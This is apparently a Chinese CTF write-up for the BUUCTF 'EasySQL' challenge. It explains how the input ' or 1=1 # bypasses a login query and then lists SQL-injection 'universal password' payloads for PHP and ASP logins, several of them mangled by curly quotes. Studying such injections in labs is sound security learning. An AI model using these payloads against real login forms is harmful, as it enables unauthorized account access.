当前位置: 首页 > 工具软件 > EasySQL > 使用案例 >

BUUCTF: [极客大挑战 2019]EasySQL 1

连曜灿
2023-12-01

BUUCTF: [极客大挑战 2019]EasySQL 1

记录 sql 注入题

账号 'or 1=1 #
密码任意
(这个很好用!)

一般的验证语句为
select * from table_name where username=‘admin’ or 1=1#’ and passwords =‘‘ssss’’

账号中的’使前面的引号闭合,or 1=1 使语句恒成立,最后的#号会注释掉#之后的语句,避免报错,所以sql语句返回真值,成功绕过验证,得到flag

学习内容:

phpPHP万能密码
'or 1=1/*
"or “a”="a
"or 1=1–
“or”="
“or”="a’='a
"or1=1–
“or=or”
'‘or’=‘or’
') or (‘a’='a
‘.).or.(’.a.’=’.a
'or 1=1
'or 1=1–
'or 1=1/*
‘or"="a’='a
‘or’ ‘1’=‘1’
‘or’’=’
‘or’’=’‘or’’=’
‘or’=‘1’
‘or’=‘or’
'or.‘a.’='a
'or1=1–
1’or’1’='1
a’or’ 1=1–
a’or’1=1–
or ‘a’=‘a’
or 1=1–
or1=1–
aspaspx万能密码
"or “a”="a
‘.).or.(’.a.’=’.a
or 1=1–
'or 1=1–
a’or’ 1=1–
"or 1=1–
'or.‘a.’='a
“or”="a’='a
‘or’’=’
‘or’=‘or’
admin’or 1=1#

本文只为记录学习 如有侵权请联系作者删除

 类似资料: